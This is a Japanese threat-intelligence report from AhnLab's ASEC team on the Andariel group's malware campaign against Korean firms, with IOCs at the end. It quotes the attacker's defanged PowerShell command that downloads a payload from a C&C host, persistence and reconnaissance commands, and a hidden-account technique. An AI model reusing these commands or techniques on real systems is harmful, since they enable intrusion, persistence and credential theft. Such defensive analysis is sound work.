ASEC 分析チームは、Lazarus グループと協力関係である、または下位組織として知られている Andariel 脅威グループが最近、特定の資産管理プログラムを利用した攻撃によってマルウェアを配布している状況を確認した。
Andariel グループは初期侵入プロセスにおいて主にスピアフィッシング攻撃や水飲み場型攻撃、そしてサプライチェーン攻撃を利用し、このほかにもマルウェアのインストール過程において集中管理ソリューションを悪用する事例も存在する。最近では Log4Shell および Innorix Agent 等、複数のプログラムに対する脆弱性を利用して韓国国内の様々な企業群に攻撃を仕掛けている。[1]
今回確認された攻撃では、韓国国内の別の資産管理プログラムが使用されており、このほかにも MS-SQL サーバーを対象とした攻撃も同時に確認された。これらの攻撃を通じてインストールされたマルウェアには、TigerRat だけでなく NukeSped 変種、Black RAT、オープンソースマルウェアである Lilith RAT 等の様々なマルウェアが存在する。攻撃対象として確認されたのは韓国国内の通信事業者、半導体製造業等、従来の攻撃対象の事例と類似している。
1. 初期侵入段階
最近、韓国国内の特定の資産管理プログラムが Andariel グループのマルウェアをインストールしたログが当社 AhnLab Smart Defense (ASD)ログから確認された。もちろん、このログだけでは脆弱性を利用した攻撃なのか、単純な悪用なのかは不明である。攻撃対象のシステムにおいて実行中の資産管理プログラムは、最終的に以下のような PowerShell コマンドを利用してマルウェアをダウンロードした。
- PowerShell コマンド : wget hxxp://109.248.150[.]147:8585/load.png -outfile C:\Users\public\credis.exe
Andariel グループはさらに PowerShell 以外にも mshta.exe プロセスを利用してマルウェアをダウンロードした。以下は C&C アドレスにアップロードされた HTML マルウェアであり、TigerRat のような Andariel グループの他のマルウェアをダウンロードする機能を担う。
過去の攻撃事例において、Andariel グループは Innorix Agent だけでなく、スピアフィッシング攻撃を同時に使用していた。今回の攻撃事例で目立つ点は MS-SQL サーバーを利用したマルウェアのインストール事例が共に存在するということである。攻撃者は不適切に管理されている MS-SQL サーバーを攻撃して NukeSped をインストールしたものと推定される。Remcos RAT、Mallox ランサムウェア等のマルウェアは主に総当たり攻撃や辞書攻撃に脆弱な資格証明情報を持つ MS-SQL サーバーを対象とする攻撃によってインストールされるが、当該システムでは過去にも他の攻撃者がこれらのマルウェアをインストールしようと試みたログが確認されたからである。すなわち、Andariel グループも最近は不適切に管理されている MS-SQL サーバーを攻撃ベクトルに活用しているものと見られる。
攻撃のプロセスでは、一般的な MS-SQL サーバーを対象とする攻撃事例と同じく、権限昇格を目的として PrintSpoofer マルウェアが同時に使用されている。
2. 攻撃に使用されたマルウェア
上記の攻撃によってインストールされたバックドアマルウェアには、Andariel グループの代表的なマルウェアの一つである TigerRat、Black RAT、NukeSped の変種がある。これらのマルウェアは従来の攻撃とほぼ類似しているが、今回の攻撃事例ではオープンソースマルウェアである Lilith RAT が使用されたことが特徴である。このほかにも、最近は Go 言語で開発されたマルウェアを頻繁に使用する Andariel グループの流れと同じく、Go 言語で開発されたダウンローダーマルウェアも共に確認されている。
2.1. TigerRat
韓国国内の資産管理プログラムによってインストールされたマルウェアは、TigerRat であった。Andariel グループは過去、水飲み場型攻撃から Log4Shell 脆弱性攻撃等、ほとんどの韓国国内をターゲットとする攻撃で TigerRat を使用している。[2] TigerRat はバックドアマルウェアであり、ファイルのアップロードおよびダウンロード、コマンドの実行、基本情報収集、キーロガー、スクリーンキャプチャ、ポートフォワーディング等、様々な機能をサポートしている。
一般的なバックドアマルウェアとの違いは、C&C サーバーとの初期通信プロセスにおいて特定の文字列をやり取りする認証プロセスが存在するという点である。今回の攻撃に使用された TigerRat も2023年に確認されたタイプと同じく 0x20 サイズのランダムな文字列が認証に使われていた。これらの文字列は「fool」(dd7b696b96434d2bf07b34f9c125d51d)、「iwan」(01ccce480c60fcdb67b54f4509ffdb56)に対する MD5 ハッシュと推定される。
- C&C リクエスト文字列 : dd7b696b96434d2bf07b34f9c125d51d
- C&C レスポンス文字列 : 01ccce480c60fcdb67b54f4509ffdb56
2.2. Golang ダウンローダー
Andariel グループは2023年頃から様々なバックドアマルウェアを Go 言語で製作して使用している。過去の事例では Black RAT、Goat RAT、DurianBeacon 等が使用されており、今回の攻撃事例では Go 言語で開発されたダウンローダーマルウェアが使われた。このマルウェアは単純な形式であり、C&C サーバーに接続して追加のペイロードをインストールする。特徴としては、C&C サーバーとの通信に Base64 エンコードを使用するという点がある。
攻撃者は韓国国内の資産管理プログラムを悪用して直接 TigerRat をインストールする場合もあるが、Golang ダウンローダーをインストールしたあと、そのマルウェアが追加のペイロードをインストールする方式も使用した。Golang ダウンローダーによってインストールされたマルウェアには、TigerRat と NukeSped 変種マルウェアがある。
2.3. NukeSped 変種
NukeSped は C&C サーバーからコマンドを受け取り感染システムを操作できるようにするバックドアマルウェアである。攻撃に使われた NukeSped 変種のうち最初のタイプは C&C サーバーとの通信時に POST メソッドを利用してパケットを送信し、その後 C&C サーバーから渡されたコマンドを実行した結果は Google への接続を偽装した GET メソッドを利用して送信する点が特徴である。
攻撃プロセスでは、他の NukeSped 変種も確認されている。サイズは 23KB と小さいが、自己削除に使われる文字列は従来の NukeSped 変種と類似している。
2.4. Black RAT
Black RAT は Go 言語で開発されたバックドアマルウェアであり、2023年に Andariel グループの攻撃事例で最初に確認された。今回の攻撃に使用された Black RAT にはソースコード情報は含まれていないが、関数名が従来の Black RAT とほぼ類似していることから区分が可能である。
2.5. Lilith RAT
Lilith RAT は Github に公開されているオープンソース RAT マルウェアである。C++ 言語で開発されており、リモートコマンドの実行、持続性の維持、自己削除等、感染システムを操作できるようにするための様々な機能を提供する。
Andariel グループが攻撃に使用した Lilith RAT は、バイナリに存在する文字列のうち相当数が暗号化されているが、これはファイル検知を回避するための目的であると推定される。しかしすべての文字列が暗号化されているわけではなく、一部の文字列は Lilith RAT のソースコードと同じである。
2.6. ユーザーアカウントの追加
攻撃者はバックドアマルウェアを利用して感染システムを操作するほかにも、感染システムにユーザーアカウントを追加してこれを隠蔽した。このようなタスクには直接製作したマルウェアを利用していたが、そのマルウェアは感染システムに特定のユーザーアカウントが存在する場合にのみ正常に動作するため、これは既に感染システムの操作権限が奪われた後であることを意味している。
一般的に、攻撃者がバックドアを利用して感染システムを操作できるにもかかわらずユーザーアカウントを追加する理由は、以降リモートデスクトップを利用して GUI 環境で感染システムを操作し、持続性を維持するためである。ただし、単にアカウントだけを追加すると、システムのユーザーがログインするプロセスで新たに作成されたユーザーアカウントは認知されてしまう。
そのため、ユーザーがこれを認知できないように、マルウェアは以下のようなプロセスを実行する。まず、アカウント名に「$」記号を付けて作成したあと、既存ユーザーの SAM データの一部をコピーして作成した「black$」アカウントに上書きする。もし既存ユーザーが管理者アカウントであり、リモートデスクトップが許可されているユーザーならば「black$」アカウントもその特性を同じように持つことができる。
参考に、Kimsuky グループが使用していたマルウェアはユーザーアカウントの追加後、管理者グループに登録して SpecialAccounts に追加し、ファイアウォールでも当該アカウントを有効化させた。[3] このようなプロセスはセキュリティ製品により容易に検知が可能だが、Andariel グループは上記のマルウェアを利用してこのような追加のタスクなしでも隠蔽されたアカウントを追加したという点が特徴である。
3. 感染後
攻撃者はバックドアマルウェアをインストールした後、持続性を維持するために以下のようなコマンドを実行してタスクスケジューラに登録した。
| > schtasks /delete /tn “microsoft\******” /f > schtasks /create /tn “microsoft\******” /tr “c:\users\%ASD%\credis.exe” /sc onlogon /ru system > schtasks /run /tn “microsoft\windows\mui\route” |
以降、以下のコマンドを利用して感染システムの情報を照会した。
| > cmd.exe /c “query user” > cmd.exe /c “ipconfig” > cmd.exe /c “whoami” > cmd.exe /c “cmdkey /list” > cmd.exe /c “netsat -nao | findstr 445” |
このほかにも、ダウンローダーマルウェアを削除したり、他のプロセスを終了するコマンドも確認されている。
| > cmd.exe /c “del /f c:\users\%ASD%\perf.exe” > taskkill /f /pid 15036 |
攻撃者は、バックドアを利用して情報を収集するほかにも NirSoft 社の CredentialsFileVIew、Network Password Recovery のような HackTool を追加でダウンロードして使用した。このツールは感染システムに保存されている資格証明情報と共有フォルダーの資格証明情報を表示するツールであり、以降感染システムが存在する組織の内部ネットワーク上でラテラルムーブメントのために使われることがある。
4. 結論
Andariel グループは Kimsuky、Lazarus グループと共に韓国国内を対象に活発に活動している脅威グループの一つである。初期では主に安全保障に関する情報を取得するために攻撃を展開していたが、以降は金銭的利得を目的とした攻撃も行っている。[4](韓国語で提供) 初期侵入時は主にスピアフィッシング攻撃や水飲み場型攻撃、そしてソフトウェアの脆弱性を利用することが知られており、攻撃プロセスで他の脆弱性を利用してマルウェアを配布する状況も確認されている。
最近確認された攻撃事例では、脆弱な MY-SQL サーバーへの攻撃だけでなく、資産管理プログラム等、会社内の複数のプログラムを利用してサプライチェーン攻撃を実行しているものと見られる。ユーザーは、出どころが不明なメールの添付ファイルや Web ページからダウンロードした実行ファイルには特に注意する必要があり、企業のセキュリティ担当者は資産管理プログラムのモニタリングを強化し、プログラムにセキュリティ上の脆弱性がある場合はパッチを適用しなければならない。また、OS およびインターネットブラウザ等のプログラムの最新パッチや V3 を最新バージョンにアップデートし、このようなマルウェアの感染を事前に遮断できるよう注意を払わなければならない。
現在 V3 では以下のように検知しており、IOC は以下の通りである。
ファイル検知
– Malware/Win.Generic.C5528992 (2023.10.25.00)
– Malware/Win.Generic.C5528516 (2023.10.26.00)
– Backdoor/Win.TigerRAT.C5517634 (2023.10.19.03)
– Backdoor/Win.Agent.C5518308 (2023.10.20.00)
– Downloader/HTML.Agent.SC193459 (2023.10.19.03)
– Downloader/HTML.Agent.SC193403 (2023.10.18.01)
– Backdoor/Win.TigerRAT.C5513095 (2023.10.17.03)
– Unwanted/Win.HackTool.C5175443 (2022.06.20.02)
– HackTool/Win.CredentialsFileView (2022.04.20.00)
– Backdoor/Win.Agent.R619279 (2023.11.01.01)
– Backdoor/Win.Agent.C5534745 (2023.11.01.01)
– Backdoor/Win.NukeSped.C5535346 (2023.11.01.03)
– Backdoor/Win.BlackRAT.C5535345 (2023.11.01.03)
– Exploit/Win.PrintSpoofer.C5535350 (2023.11.02.00)
振る舞い検知
– Malware/MDP.Download.M1197
IOC
MD5
– 13b4ce1fc26d400d34ede460a8530d93 : TigerRat (credisvs.exe, credis.exe)
– 41895c5416fdc82f7e0babc6bb6c7216 : TigerRat (credisvs.exe)
– c2f8c9bb7df688d0a7030a96314bb493 : TigerRat (crec.exe, dbinfo.exe)
– 33a3da2de78418b89a603e28a1e8852c : TigerRat (mltest.exe)
– 4896da30a745079cd6265b6332886d45 : Lilith RAT (svchost.exe, secure.exe, test.exe)
– 73eb2f4f101aab6158c615094f7a632a : NukeSped 変種 – Type 1 (system.exe, credisvc.exe)
– 7f33d2d2a2ce9c195202acb59de31eee : NukeSped 変種 – Type 1 (mshelp.exe)
– e1afd01400ef405e46091e8ef10c721c : NukeSped 変種 – Type 1 (msuser.exe)
– fe25c192875ec1914b8880ea3896cda2 : NukeSped 変種 – Type 1 (credisvc.exe)
– 232586f8cfe82b80fd0dfa6ed8795c56 : NukeSped 変種 – Type 2 (perf.exe)
– c1f266f7ec886278f030e7d7cd4e9131 : Black RAT (winsta.exe)
– 49bb2ad67a8c5dfbfe8db2169e6fa46e : Golang ダウンローダー (perf.exe)
– beb199b15bd075996fa8d6a0ed554ca8 : Golang ダウンローダー (credisvc.exe)
– 4053ca3e37ed1f8d37b29eed61c2e729 : ユーザーアカウント追加マルウェア (test.exe)
– 3a0c8ae783116c1840740417c4fbe678 : ユーザーアカウント追加マルウェア (test.exe)
– 0414a2ab718d44bf6f7103cff287b312 : PrintSpoofer (print.exe)
– ca564428a29faf1a613f35d9fa36313f : Network Password Recovery – NirSoft (net.exe)
– ad6d4eb34d29e350f96dc8df6d8a092e : CredentialsFileView – NirSoft (credentialsfileview.exe)
– dc70dc9845aa747001ebf2a02467c203 : ダウンロードスクリプト
– 3d2ec58f37c8176e0dbcc47ff93e5a76 : ダウンロードスクリプト
C&C アドレス
– 27.102.115[.]207:8088 : Black RAT, NukeSped 変種 Type 2
– 27.102.118[.]204:8081 : Golang ダウンローダー
– 84.38.132[.]67:8443 : NukeSped 変種 Type 1, Lilith RAT
– 109.248.150[.]147:443 : TigerRat
– 109.248.150[.]147:8080 : TigerRat
– 109.248.150[.]147:8443 : TigerRat
– 185.29.8[.]108:443 : TigerRat
– 185.29.8[.]108:3443 : TigerRat
– 185.29.8[.]108:4443 : TigerRat
– 185.29.8[.]108:8080 : TigerRat
– 185.29.8[.]108:8081 : Golang ダウンローダー
– 185.29.8[.]108:8443 : TigerRat, NukeSped 変種 Type 1
ダウンロードアドレス
– hxxp://27.102.128[.]152:8098/load.png : TigerRat
– hxxp://27.102.118[.]204:6099/fav.ico : Golang ダウンローダー
– hxxp://84.38.132[.]67:9479/fav.ico : User Adder, Lilith RAT
– hxxp://84.38.132[.]67:9479/netpass.png : Network Password Recovery – NirSoft
– hxxp://109.248.150[.]147:8585/load.png : TigerRat
– hxxp://109.248.150[.]147:8585/load.html : ダウンロードスクリプト
– hxxp://109.248.150[.]147:8585/view.php : TigerRat
– hxxp://185.29.8[.]108:8585/load.html : ダウンロードスクリプト
– hxxp://185.29.8[.]108:8585/view.php : TigerRat
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報